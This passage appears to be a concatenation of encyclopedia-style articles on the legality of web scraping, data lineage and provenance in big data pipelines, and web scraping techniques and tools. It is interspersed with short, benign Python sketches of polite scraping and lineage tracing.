publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Apart from a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
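The counter-measures themselves are site-specific, but a scraper that wants to avoid triggering them can, at a minimum, honor robots.txt and throttle its request rate. A minimal sketch, with a hypothetical base URL, user agent, and delay:

import time
import requests
from urllib.robotparser import RobotFileParser

BASE = "https://example.com"                # hypothetical target site
USER_AGENT = "example-research-bot/0.1"     # hypothetical bot identity

robots = RobotFileParser()
robots.set_url(BASE + "/robots.txt")
robots.read()

def polite_get(path, delay=2.0):
    url = BASE + path
    if not robots.can_fetch(USER_AGENT, url):
        print("Disallowed by robots.txt:", url)
        return None
    time.sleep(delay)  # crude rate limiting between requests
    return requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=10)

resp = polite_get("/products")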
52 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_lineage | Data lineage includes the data origin, what happens to it, and where it moves over time. 1 Data lineage provides visibility and simplifies tracing errors back to the root cause in a data analytics process. 2 It also enables replaying specific portions or inputs of the data flow for step-wise debugging or regenerating lost output. Database systems use such information, called data provenance, to address similar validation and debugging challenges. 3 Data provenance refers to records of the inputs, entities, systems, and processes that influence data of interest, providing a historical record of the data and its origins. The generated evidence supports forensic activities such as data-dependency analysis, error and compromise detection and recovery, auditing, and compliance analysis. "Lineage is a simple type of why provenance." 3 Data lineage can be represented visually to discover the data flow movement from its source to destination via various changes and hops on its way in the enterprise environment: how the data gets transformed along the way, how the representation and parameters change, and how the data splits or converges after each hop. A simple representation of data lineage can be shown with dots and lines, where a dot represents a data container for data points and the lines connecting them represent the transformations the data points undergo between the data containers. The representation broadly depends on the scope of the metadata management and the reference point of interest. Data lineage provides the sources of the data and the intermediate data flow hops from the reference point with backward data lineage, and leads to the final destination's data points and their intermediate data flows with forward data lineage. These views can be combined into end-to-end lineage for a reference point, providing a complete audit trail of that data point of interest from sources to their final destinations. As the number of data points or hops increases, the complexity of such a representation becomes incomprehensible. Thus, a key feature of a data lineage view is the ability to simplify it by temporarily masking unwanted peripheral data points. Tools that have the masking feature enable scalability of the view and enhance analysis with the best user experience for both technical and business users. Data lineage also enables companies to trace sources of specific business data for the purposes of tracking errors, implementing changes in processes, and implementing system migrations to save significant amounts of time and resources, thereby tremendously improving BI efficiency. 4 The scope of the data lineage determines the volume of metadata required to represent it. Usually, data governance and data management determine the scope of the data lineage based on their regulations, enterprise data management strategy, data impact, reporting attributes, and critical data elements of the organization. Data lineage provides the audit trail of the data points at the highest granular level, but presentation of the lineage may be done at various zoom levels to simplify the vast information, similar to analytic web maps. Data lineage can be visualized at various levels based on the granularity of the view. At a very high level, data lineage describes which systems the data interacts with before it reaches its destination. As the granularity increases, it extends to the data point level, where it can provide the details of the data point and its historical behavior, attribute properties, trends, and the data quality of the data passed through that specific data point in the data lineage. 
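A minimal sketch of the dots-and-lines view just described, with data containers as nodes, transformations as directed edges, and backward and forward lineage computed as graph traversals from a reference point; the container names are hypothetical:

# container -> downstream containers it feeds (hypothetical enterprise data flow)
edges = {
    "raw_orders": ["clean_orders"],
    "raw_customers": ["clean_customers"],
    "clean_orders": ["orders_by_region"],
    "clean_customers": ["orders_by_region"],
    "orders_by_region": ["quarterly_report"],
}

def forward_lineage(node):
    # all downstream containers reachable from `node`
    out, stack = set(), [node]
    while stack:
        for nxt in edges.get(stack.pop(), []):
            if nxt not in out:
                out.add(nxt)
                stack.append(nxt)
    return out

def backward_lineage(node):
    # all upstream containers that eventually feed into `node`
    return {src for src in edges if node in edges[src] or node in forward_lineage(src)}

print(backward_lineage("orders_by_region"))  # sources feeding the reference point
print(forward_lineage("clean_orders"))       # destinations reached from it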
Data governance plays a key role in metadata management for guidelines, strategies, policies, and implementation. Data quality and master data management help enrich the data lineage with more business value. Even though the final representation of data lineage is provided in one interface, the way the metadata is harvested and exposed to the data lineage graphical user interface can be entirely different. Thus, data lineage can be broadly divided into three categories based on the way metadata is harvested: data lineage involving software packages for structured data, programming languages, and big data. Data lineage information includes technical metadata involving data transformations. Enriched data lineage information may include data quality test results, reference data values, data models, business vocabulary, data stewards, program management information, and enterprise information systems linked to the data points and transformations. The masking feature in data lineage visualization allows the tools to incorporate all the enrichments that matter for the specific use case. To represent disparate systems in one common view, "metadata normalization" or standardization may be necessary. Distributed systems like Google MapReduce, 5 Microsoft Dryad, 6 Apache Hadoop 7 (an open-source project) and Google Pregel 8 provide such platforms for businesses and users. However, even with these systems, big data analytics can take several hours, days or weeks to run, simply due to the data volumes involved. For example, a ratings prediction algorithm for the Netflix Prize challenge took nearly 20 hours to execute on 50 cores, and a large-scale image processing task to estimate geographic information took 3 days to complete using 400 cores. 9 "The Large Synoptic Survey Telescope is expected to generate terabytes of data every night and eventually store more than 50 petabytes, while in the bioinformatics sector, the largest genome 12 sequencing houses in the world now store petabytes of data apiece." 10 It is very difficult for a data scientist to trace an unknown or an unanticipated result. Big data analytics is the process of examining large data sets to uncover hidden patterns, unknown correlations, market trends, customer preferences and other useful business information. Machine learning and other algorithms are applied to the data, which transform it. Due to the enormous size of the data, there can be unknown features in it, possibly even outliers. It is quite difficult for a data scientist to actually debug an unexpected result. The massive scale and unstructured nature of data, the complexity of these analytics pipelines, and long runtimes pose significant manageability and debugging challenges. Even a single error in these analytics can be extremely difficult to identify and remove. While one may debug them by re-running the entire analytics through a debugger for step-wise debugging, this can be expensive due to the amount of time and resources needed. Auditing and data validation are other major problems due to the growing ease of access to relevant data sources for use in experiments, the sharing of data between scientific communities, and the use of third-party data in business enterprises. 
11 12 13 14 These problems will only become larger and more acute as these systems and data continue to grow. As such, more cost-efficient ways of analyzing data-intensive scalable computing (DISC) are crucial to their continued effective use. According to an EMC/IDC study: 15 Working with this scale of data has become very challenging. Unstructured data usually refers to information that doesn't reside in a traditional row-column database. Unstructured data files often include text and multimedia content. Examples include e-mail messages, word processing documents, videos, photos, audio files, presentations, webpages and many other kinds of business documents. Note that while these sorts of files may have an internal structure, they are still considered "unstructured" because the data they contain doesn't fit neatly in a database. Experts estimate that 80 to 90 percent of the data in any organization is unstructured. The amount of unstructured data in enterprises is growing significantly, often many times faster than structured databases are growing. "Big data can include both structured and unstructured data, but IDC estimates that 90 percent of big data is unstructured data." 16 The fundamental challenge of unstructured data sources is that they are difficult for non-technical business users and data analysts alike to unbox, understand, and prepare for analytic use. Beyond issues of structure is the sheer volume of this type of data. Because of this, current data mining techniques often leave out valuable information and make analyzing unstructured data laborious and expensive. 17 In today's competitive business environment, companies have to find and analyze the relevant data they need quickly. The challenge is going through the volumes of data and accessing the level of detail needed, all at a high speed. The challenge only grows as the degree of granularity increases. One possible solution is hardware. Some vendors are using increased memory and parallel processing to crunch large volumes of data quickly. Another method is putting data in-memory but using a grid computing approach, where many machines are used to solve a problem. Both approaches allow organizations to explore huge data volumes. Even with this level of sophisticated hardware and software, some of the large-scale image processing tasks take a few days to a few weeks. 18 Debugging of the data processing is extremely hard due to long run times. A third approach of advanced data discovery solutions combines self-service data prep with visual data discovery, enabling analysts to simultaneously prepare and visualize data side-by-side in an interactive analysis environment offered by newer companies such as Trifacta, Alteryx and others. 19 Another way to track data lineage is through spreadsheet programs such as Excel, which offer users cell-level lineage, or the ability to see which cells are dependent on another, but the structure of the transformation is lost. Similarly, ETL or mapping software provides transform-level lineage, yet this view typically doesn't display data and is too coarse-grained to distinguish between transforms that are logically independent (e.g. transforms that operate on distinct columns) or dependent. 20 Big data platforms have a very complicated structure, with data distributed among several machines. Typically, the jobs are mapped onto several machines and the results are later combined by reduce operations. Debugging of a big data pipeline becomes very challenging because of the very nature of the system. 
It will not be an easy task for the data scientist to figure out which machine's data has the outliers and unknown features causing a particular algorithm to give unexpected results. Data provenance or data lineage can be used to make the debugging of a big data pipeline easier. This necessitates the collection of data about data transformations. The section below explains data provenance in more detail. Scientific data provenance provides a historical record of the data and its origins. The provenance of data which is generated by complex transformations such as workflows is of considerable value to scientists. 21 From it, one can ascertain the quality of the data based on its ancestral data and derivations, track back sources of errors, allow automated re-enactment of derivations to update data, and provide attribution of data sources. Provenance is also essential to the business domain where it can be used to drill down to the source of data in a data warehouse, track the creation of intellectual property, and provide an audit trail for regulatory purposes. The use of data provenance is proposed in distributed systems to trace records through a dataflow, replay the dataflow on a subset of its original inputs and debug data flows. To do so, one needs to keep track of the set of inputs to each operator, which were used to derive each of its outputs. Although there are several forms of provenance, such as copy-provenance and how-provenance, 14 22 the information we need is a simple form of why-provenance, or lineage, as defined by Cui et al. 23 PROV is a 2013 W3C recommendation. Intuitively, for an operator T producing output o, lineage consists of triplets of the form {I, T, o}, where I is the set of inputs to T used to derive o. Capturing lineage for each operator T in a dataflow enables users to ask questions such as “Which outputs were produced by an input i on operator T?” and “Which inputs produced output o in operator T?” 3 A query that finds the inputs deriving an output is called a backward tracing query, while one that finds the outputs produced by an input is called a forward tracing query. 26 Backward tracing is useful for debugging, while forward tracing is useful for tracking error propagation. 26 Tracing queries also form the basis for replaying an original dataflow. 12 23 26 However, to efficiently use lineage in a DISC system, we need to be able to capture lineage at multiple levels (or granularities) of operators and data, capture accurate lineage for DISC processing constructs and be able to trace through multiple dataflow stages efficiently. A DISC system consists of several levels of operators and data, and different use cases of lineage can dictate the level at which lineage needs to be captured. Lineage can be captured at the level of the job, using files and giving lineage tuples of the form {IF_i, MRJob, OF_i}; it can also be captured at the level of each task, using records and giving, for example, lineage tuples of the form {(k_rr, v_rr), map, (k_m, v_m)}. The first form of lineage is called coarse-grain lineage, while the second form is called fine-grain lineage. Integrating lineage across different granularities enables users to ask questions such as “Which file read by a MapReduce job produced this particular output record?” and can be useful in debugging across different operator and data granularities within a dataflow. 3 
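A minimal sketch of these ideas on a toy word-count flow: lineage is captured as {I, T, o} triplets for hypothetical map and reduce operators, and the backward and forward tracing queries are answered directly from those triplets:

lineage = []   # list of (input_ids, operator, output_id) triplets

records = {"r1": "big data", "r2": "data lineage"}

# "map" operator: one output token per word of each input record
tokens = {}
for rid, text in records.items():
    for i, word in enumerate(text.split()):
        tid = f"{rid}.t{i}"
        tokens[tid] = word
        lineage.append(({rid}, "map", tid))

# "reduce" operator: one count per distinct word, derived from all of its tokens
counts = {}
for word in set(tokens.values()):
    ids = {tid for tid, w in tokens.items() if w == word}
    counts[word] = len(ids)
    lineage.append((ids, "reduce", word))

def backward_trace(output_id, operator):
    # "Which inputs produced output o in operator T?"
    return set().union(*(I for I, T, o in lineage if T == operator and o == output_id))

def forward_trace(input_id, operator):
    # "Which outputs were produced by input i on operator T?"
    return {o for I, T, o in lineage if T == operator and input_id in I}

print(backward_trace("data", "reduce"))   # token ids that contributed to the count of "data"
print(forward_trace("r1", "map"))         # tokens emitted from record r1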
To capture end-to-end lineage in a DISC system, we use the Ibis model, 27 which introduces the notion of containment hierarchies for operators and data. Specifically, Ibis proposes that an operator can be contained within another, and such a relationship between two operators is called operator containment. "Operator containment implies that the contained (or child) operator performs a part of the logical operation of the containing (or parent) operator." 3 For example, a MapReduce task is contained in a job. Similar containment relationships exist for data as well, called data containment. Data containment implies that the contained data is a subset of the containing data (superset). The concept of prescriptive data lineage combines the logical model (entity) of how that data should flow with the actual lineage for that instance. 28 The terms 'data lineage' and 'provenance' generally describe the sequence of steps or processes through which a dataset has passed to reach its current state. However, looking back at the audit or log correlations to determine the lineage from a forensic point of view fails for certain data management cases. For instance, it is impossible to determine with certainty whether the route a data workflow took was correct or in compliance without the logical model. Only by combining a logical model with atomic forensic events can proper activities be validated. Many certified compliance reports require provenance of the data flow as well as the end-state data for a specific instance. In these types of situations, any deviation from the prescribed path needs to be accounted for and potentially remediated. 29 This marks a shift from a purely "looking back" approach to a framework better suited to capturing compliance workflows. Lazy lineage collection typically captures only coarse-grain lineage at run time. These systems incur low capture overheads due to the small amount of lineage they capture. However, to answer fine-grain tracing queries, they must replay the data flow on all (or a large part) of its input and collect fine-grain lineage during the replay. This approach is suitable for forensic systems, where a user wants to debug an observed bad output. Active collection systems capture the entire lineage of the data flow at run time. The kind of lineage they capture may be coarse-grain or fine-grain, but they do not require any further computations on the data flow after its execution. Active fine-grain lineage collection systems incur higher capture overheads than lazy collection systems. However, they enable sophisticated replay and debugging. 3 An actor is an entity that transforms data; it may be a Dryad vertex, individual map and reduce operators, a MapReduce job, or an entire dataflow pipeline. Actors act as black boxes, and the inputs and outputs of an actor are tapped to capture lineage in the form of associations, where an association is a triplet {i, T, o} that relates an input i with an output o for an actor T. The instrumentation thus captures lineage in a dataflow one actor at a time, piecing it into a set of associations for each actor. The system developer needs to capture the data an actor reads (from other actors) and the data an actor writes (to other actors). For example, a developer can treat the Hadoop Job Tracker as an actor by recording the set of files read and written by each job. 30 An association is a combination of the inputs, the outputs and the operation itself. The operation is represented in terms of a black box, also known as the actor. 
The associations describe the transformations that are applied to the data. The associations are stored in association tables. Each unique actor is represented by its own association table. An association itself looks like {i, T, o}, where i is the set of inputs to the actor T and o is the set of outputs produced by the actor. Associations are the basic units of data lineage. Individual associations are later combined to construct the entire history of transformations that were applied to the data. 3 Big data systems scale horizontally, i.e. they increase capacity by adding new hardware or software entities to the distributed system. The distributed system acts as a single entity at the logical level even though it comprises multiple hardware and software entities, and the system should continue to maintain this property after horizontal scaling. An important advantage of horizontal scalability is that it can provide the ability to increase capacity on the fly. Another big advantage is that horizontal scaling can be done using commodity hardware. The horizontal scaling feature of big data systems should be taken into account while creating the architecture of the lineage store. This is essential because the lineage store itself should also be able to scale in parallel with the big data system. The number of associations and the amount of storage required to store lineage will increase with the size and capacity of the system. The architecture of big data systems makes a single lineage store inappropriate and impossible to scale. The immediate solution to this problem is to distribute the lineage store itself. 3 The best-case scenario is to use a local lineage store for every machine in the distributed system network. This allows the lineage store to scale horizontally as well. In this design, the lineage of data transformations applied to the data on a particular machine is stored on the local lineage store of that specific machine. The lineage store typically stores association tables. Each actor is represented by its own association table. The rows are the associations themselves and the columns represent inputs and outputs. This design solves two problems: it allows horizontal scaling of the lineage store, and it avoids the network latency that a single centralized lineage store would incur, since association information no longer has to be carried over the network. 30 The information stored in terms of associations needs to be combined by some means to get the data flow of a particular job. In a distributed system a job is broken down into multiple tasks. One or more instances run a particular task. The results produced on these individual machines are later combined to finish the job. Tasks running on different machines perform multiple transformations on the data on those machines. All the transformations applied to the data on a machine are stored in the local lineage store of that machine. This information needs to be combined to get the lineage of the entire job. The lineage of the entire job should help the data scientist understand the data flow of the job, and they can use the data flow to debug the big data pipeline. 
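A minimal sketch of such a per-machine lineage store, with one association table per actor and rows of (inputs, outputs); the machine and actor names are hypothetical:

from collections import defaultdict

class LocalLineageStore:
    def __init__(self, machine_id):
        self.machine_id = machine_id
        self.tables = defaultdict(list)   # actor name -> list of association rows

    def record(self, actor, inputs, outputs):
        self.tables[actor].append({"inputs": set(inputs), "outputs": set(outputs)})

    def associations(self, actor):
        return self.tables.get(actor, [])

# Each machine in the cluster writes only to its own store, avoiding the network
# hop a single centralized store would require.
store_m1 = LocalLineageStore("machine-1")
store_m2 = LocalLineageStore("machine-2")
store_m1.record("map", ["rec1", "rec2"], ["kv1", "kv2"])
store_m2.record("map", ["rec3"], ["kv3"])
store_m2.record("reduce", ["kv1", "kv2", "kv3"], ["count_data"])

print(store_m1.associations("map"))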
The data flow is reconstructed in three stages. The first stage of the data flow reconstruction is the computation of the association tables. Association tables exist for each actor in each local lineage store, and the entire association table for an actor can be computed by combining these individual association tables. This is generally done using a series of equality joins based on the actors themselves. In a few scenarios the tables might also be joined using inputs as the key. Indexes can also be used to improve the efficiency of a join. The joined tables need to be stored on a single instance or machine to continue processing. There are multiple schemes used to pick the machine where a join will be computed; the simplest is the machine with the minimum CPU load. Space constraints should also be kept in mind while picking the instance where the join will happen. The second step in data flow reconstruction is computing an association graph from the lineage information. The graph represents the steps in the data flow. The actors act as vertices and the associations act as edges. Each actor T is linked to its upstream and downstream actors in the data flow. An upstream actor of T is one that produced the input of T, while a downstream actor is one that consumes the output of T. Containment relationships are always considered while creating the links. The graph consists of three types of links or edges. The simplest link is an explicitly specified link between two actors. These links are explicitly specified in the code of a machine learning algorithm. When an actor is aware of its exact upstream or downstream actor, it can communicate this information to the lineage API. This information is later used to link these actors during the tracing query. For example, in the MapReduce architecture, each map instance knows the exact record reader instance whose output it consumes. 3 Developers can attach data flow archetypes to each logical actor. A data flow archetype explains how the child types of an actor type arrange themselves in a data flow. With the help of this information, one can infer a link between each actor of a source type and a destination type. For example, in the MapReduce architecture, the map actor type is the source for reduce, and vice versa. The system infers this from the data flow archetypes and duly links map instances with reduce instances. However, there may be several MapReduce jobs in the data flow, and linking all map instances with all reduce instances can create false links. To prevent this, such links are restricted to actor instances contained within a common actor instance of a containing (or parent) actor type. Thus, map and reduce instances are only linked to each other if they belong to the same job. 3 In distributed systems, sometimes there are implicit links, which are not specified during execution. For example, an implicit link exists between an actor that wrote to a file and another actor that read from it. Such links connect actors which use a common data set for execution. The dataset is the output of the first actor and is the input of the actor following it. 3 The final step in the data flow reconstruction is the topological sorting of the association graph. The directed graph created in the previous step is topologically sorted to obtain the order in which the actors have modified the data. This inherent order of the actors defines the data flow of the big data pipeline or task. This is the most crucial step in big data debugging. The captured lineage is combined and processed to obtain the data flow of the pipeline. The data flow helps the data scientist or a developer to look deeply into the actors and their transformations, and this step allows the data scientist to figure out the part of the algorithm that is generating the unexpected output. 
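A minimal sketch of the three reconstruction stages, using hypothetical actors and associations: the merged association tables are linked into an actor graph wherever one actor's outputs appear among another's inputs, and a topological sort recovers the data flow (graphlib is in the Python 3.9+ standard library):

from graphlib import TopologicalSorter

# Stage 1: association tables merged from all local lineage stores (actor -> rows of (inputs, outputs))
merged = {
    "record_reader": [({"input.txt"}, {"rec1", "rec2"})],
    "map":           [({"rec1", "rec2"}, {"kv1", "kv2"})],
    "reduce":        [({"kv1", "kv2"}, {"counts"})],
}

# Stage 2: link actor A -> actor B whenever some output of A is an input of B
predecessors = {actor: set() for actor in merged}
for a, rows_a in merged.items():
    outs_a = set().union(*(outs for _, outs in rows_a))
    for b, rows_b in merged.items():
        if a == b:
            continue
        ins_b = set().union(*(ins for ins, _ in rows_b))
        if outs_a & ins_b:
            predecessors[b].add(a)

# Stage 3: topological sort gives the order in which the actors touched the data
order = list(TopologicalSorter(predecessors).static_order())
print(order)   # ['record_reader', 'map', 'reduce']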
A big data pipeline can go wrong in two broad ways. The first is the presence of a suspicious actor in the data flow; the second is the existence of outliers in the data. The first case can be debugged by tracing the data flow. By using lineage and data flow information together, a data scientist can figure out how the inputs are converted into outputs. During the process, actors that behave unexpectedly can be caught. Either these actors can be removed from the data flow, or they can be augmented by new actors to change the data flow. The improved data flow can be replayed to test its validity. Debugging faulty actors includes recursively performing coarse-grain replay on actors in the data flow, 31 which can be expensive in resources for long dataflows. Another approach is to manually inspect lineage logs to find anomalies, 13 32 which can be tedious and time-consuming across several stages of a data flow. Furthermore, these approaches work only when the data scientist can discover bad outputs. To debug analytics without known bad outputs, the data scientist needs to analyze the data flow for suspicious behavior in general. However, often, a user may not know the expected normal behavior and cannot specify predicates. This section describes a debugging methodology for retrospectively analyzing lineage to identify faulty actors in a multi-stage data flow. We believe that sudden changes in an actor's behavior, such as its average selectivity, processing rate or output size, are characteristic of an anomaly. Lineage can reflect such changes in actor behavior over time and across different actor instances. Thus, mining lineage to identify such changes can be useful in debugging faulty actors in a data flow. The second problem, i.e. the existence of outliers, can also be identified by running the data flow step-wise and looking at the transformed outputs. The data scientist finds a subset of outputs that are not in accordance with the rest of the outputs. The inputs which are causing these bad outputs are the outliers in the data. This problem can be solved by removing the set of outliers from the data and replaying the entire data flow. It can also be solved by modifying the machine learning algorithm by adding, removing or moving actors in the data flow. The changes in the data flow are successful if the replayed data flow does not produce bad outputs. 
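A minimal sketch of mining lineage for sudden changes in actor behavior, as suggested above: each map instance's selectivity (outputs per input), derived from captured associations, is compared against its peers and large deviations are flagged. The numbers and the 1.5-sigma threshold are hypothetical:

from statistics import mean, stdev

# selectivity per map-task instance, computed from captured associations (hypothetical values)
selectivity = {
    "map_001": 0.98, "map_002": 1.02, "map_003": 0.97,
    "map_004": 0.05,   # suspicious: almost all records dropped
    "map_005": 1.01,
}

mu = mean(selectivity.values())
sigma = stdev(selectivity.values())

# flag instances whose selectivity deviates strongly from the peer group
suspects = {task: round((val - mu) / sigma, 2)
            for task, val in selectivity.items()
            if abs(val - mu) > 1.5 * sigma}
print(suspects)   # {'map_004': -1.79} -> candidate faulty actor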
Even though the use of data lineage approaches is a novel way of debugging big data pipelines, the process is not simple. The challenges include scalability of the lineage store, fault tolerance of the lineage store, accurate capture of lineage for black-box operators, and many others. These challenges must be considered carefully, and trade-offs between them need to be evaluated to make a realistic design for data lineage capture. DISC systems are primarily batch processing systems designed for high throughput. They execute several jobs per analytics run, with several tasks per job. The overall number of operators executing at any time in a cluster can range from hundreds to thousands depending on the cluster size. Lineage capture for these systems must be able to scale to both large volumes of data and numerous operators to avoid being a bottleneck for the DISC analytics. Lineage capture systems must also be fault tolerant to avoid rerunning data flows to capture lineage. At the same time, they must also accommodate failures in the DISC system. To do so, they must be able to identify a failed DISC task and avoid storing duplicate copies of lineage between the partial lineage generated by the failed task and the duplicate lineage produced by the restarted task. A lineage system should also be able to gracefully handle multiple instances of local lineage systems going down. This can be achieved by storing replicas of lineage associations on multiple machines; the replica can act as a backup if the primary copy is lost. Lineage systems for DISC dataflows must be able to capture accurate lineage across black-box operators to enable fine-grain debugging. Current approaches to this include Prober, which seeks to find the minimal set of inputs that can produce a specified output for a black-box operator by replaying the data flow several times to deduce the minimal set, 33 and dynamic slicing, as used by Zhang et al. 34 to capture lineage for NoSQL operators through binary rewriting to compute dynamic slices. Although producing highly accurate lineage, such techniques can incur significant time overheads for capture or tracing, and it may be preferable to instead trade some accuracy for better performance. Thus, there is a need for a lineage collection system for DISC dataflows that can capture lineage from arbitrary operators with reasonable accuracy, and without significant overheads in capture or tracing. Tracing is essential for debugging, during which a user can issue multiple tracing queries. Thus, it is important that tracing has fast turnaround times. The system of Ikeda et al. 26 can perform efficient backward tracing queries for MapReduce dataflows, but is not generic to different DISC systems and does not perform efficient forward queries. Lipstick, 35 a lineage system for Pig, 36 while able to perform both backward and forward tracing, is specific to Pig and SQL operators and can only perform coarse-grain tracing for black-box operators. Thus, there is a need for a lineage system that enables efficient forward and backward tracing for generic DISC systems and dataflows with black-box operators. Replaying only specific inputs or portions of a data flow is crucial for efficient debugging and simulating what-if scenarios. Ikeda et al. present a methodology for lineage-based refresh, which selectively replays updated inputs to recompute affected outputs. 37 This is useful during debugging for re-computing outputs when a bad input has been fixed. However, sometimes a user may want to remove the bad input and replay the lineage of outputs previously affected by the error to produce error-free outputs. We call this exclusive replay. Another use of replay in debugging involves replaying bad inputs for step-wise debugging (called selective replay). Current approaches to using lineage in DISC systems do not address these. Thus, there is a need for a lineage system that can perform both exclusive and selective replays to address different debugging needs. 
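A minimal sketch of the two replay modes just described, driven by lineage triplets over a hypothetical summing operator: exclusive replay recomputes affected outputs with the bad input removed, while selective replay re-runs only the bad input for step-wise inspection:

lineage = [  # (inputs, operator, output)
    ({"r1", "r2"}, "sum_by_key", "total_A"),
    ({"r3"},       "sum_by_key", "total_B"),
]
values = {"r1": 10, "r2": -999, "r3": 7}     # r2 is a known bad input

def sum_by_key(input_ids):
    return sum(values[i] for i in input_ids)

def exclusive_replay(bad_input):
    # recompute every output whose lineage contains bad_input, without it
    return {o: sum_by_key(I - {bad_input})
            for I, _, o in lineage if bad_input in I}

def selective_replay(bad_input):
    # re-run the operator on the bad input alone, for step-wise inspection
    return {o: sum_by_key(I & {bad_input})
            for I, _, o in lineage if bad_input in I}

print(exclusive_replay("r2"))   # {'total_A': 10}
print(selective_replay("r2"))   # {'total_A': -999}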
One of the primary debugging concerns in DISC systems is identifying faulty operators. In long dataflows with several hundreds of operators or tasks, manual inspection can be tedious and prohibitive. Even if lineage is used to narrow the subset of operators to examine, the lineage of a single output can still span several operators. There is a need for an inexpensive automated debugging system, which can substantially narrow the set of potentially faulty operators, with reasonable accuracy, to minimize the amount of manual examination required. |
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
